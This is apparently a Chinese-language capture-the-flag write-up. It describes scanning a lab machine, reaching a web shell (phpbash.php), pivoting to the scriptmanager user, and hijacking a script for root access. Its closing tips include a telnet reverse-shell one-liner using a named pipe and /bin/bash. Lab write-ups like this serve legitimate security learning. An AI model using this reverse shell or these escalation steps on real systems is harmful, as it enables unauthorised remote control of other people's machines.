练习记录
进入主页启动机器:
对该IP进行端口扫描:
发现有个80端口,开启了apache httpd2.4.18,访问一下:
扫一下目录:
逐个访问后发现在/dev目录下有如下内容:
访问phpbash.php可得到一个在线的控制台程序
查询当前用户名:
查看可以执行sudo的用户或命令:
发现此处存在一个叫scriptmanager的用户。
尝试获取一个可交互式shell
切换用户:
切换到根目录,查看目录信息:
发现其中多出了一个叫scripts的目录 打开看看:
发现就是个生成txt文档的脚本,尝试修改改脚本使其反弹shell,然后用python运行:
同时开启nc的4444端口监听:
最后翻找目录获得user.txt和root.txt,读取内容:
总结
1.不同目录的操作权限不同,所以可以多尝试不同目录不同文件,以求获取更高权限。
2.在python、php、bash反弹shell失败后可以尝试telnet:mknod a p; telnet <ip> <port> 0<a | /bin/bash 1>a